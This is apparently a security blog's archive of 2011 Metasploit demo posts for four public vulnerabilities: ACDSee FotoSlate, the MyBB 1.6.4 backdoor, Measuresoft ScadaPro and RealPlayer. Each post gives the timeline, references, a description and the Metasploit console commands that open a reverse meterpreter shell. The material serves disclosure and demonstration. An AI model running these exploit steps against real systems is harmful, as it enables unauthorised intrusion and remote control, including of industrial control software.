Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Parvez Anwar
Public release of the vulnerability the 2011-09-12
Metasploit PoC provided the 2011-10-10

PoC provided by :

Parvez Anwar
juan vazquez

Reference(s) :

CVE-2011-2595
OSVDB-75425

Affected version(s) :

ACDSee FotoSlate 4.0 Build 146 is vulnerable, other versions may also be affected.

Tested on Windows XP SP3 with :

ACDSee FotoSlate 4.0 Build 146

Description :

This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.

Commands :

use exploit/windows/fileformat/acdsee_fotoslate_string
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j

getuid
sysinfo

MyBB 1.6.4 Backdoor Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability discovered by the vendor the 2011-10-06
Public release of the vulnerability the 2011-10-06
Metasploit PoC provided the 2011-10-08

PoC provided by :

tdz

Reference(s) :

SA46300

Affected version(s) :

MyBB 1.6.4 prior to October 6th, 2011 are vulnerable.

Tested on Ubuntu 10.04.3 LTS with :

MyBB 1.6.4

Description :

myBB is a popular open source PHP forum software. Version 1.6.4 contained an unauthorized backdoor, distributed as part of the vendor’s source package.

Commands :

use exploit/unix/webapp/mybb_backdoor
set RHOST 192.168.178.21
set VHOST blackbox.zataz.loc
set URI /mybb/index.php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

EBD-ID-17848 : Measuresoft ScadaPro Remote Command Execution Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability discovered by Luigi Auriemma
Public release of the vulnerability the 2011-09-13
Metasploit PoC provided the 2011-09-16

PoC provided by :

Luigi Auriemma
mr_me
TecR0c

Reference(s) :

EDB-ID-17848

Affected version(s) :

All Measuresoft ScadaPro before version 4.0.1

Tested on Windows XP SP3 with :

Measuresoft ScadaPro 3.9.15.0 / 3.1.9

Description :

This module allows remote attackers to execute arbitray commands on the affected system by abusing via Directory Traversal attack when using the ‘xf’ command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution.

Commands :

use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.178.78
exploit

getuid
sysinfo

CVE-2011-2950 : RealNetworks RealPlayer QCP Parsing Heap Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Sean de Regge and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-01
Coordinated public release of the vulnerability the 2011-08-16
Metasploit PoC provided the 2011-09-16

PoC provided by :

Sean de Regge
juan vazquez

Reference(s) :

CVE-2011-2950
ZDI-11-265
OSVDB-74549

Affected version(s) :

RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Apple RealPlayer 14.0.2.633

Description :

This module exploits a heap overflow in Realplayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.

Commands :

use exploit/windows/browser/realplayer_qcp
set SRVHOST 192.168.178.21
exploit
getuid
sysinfo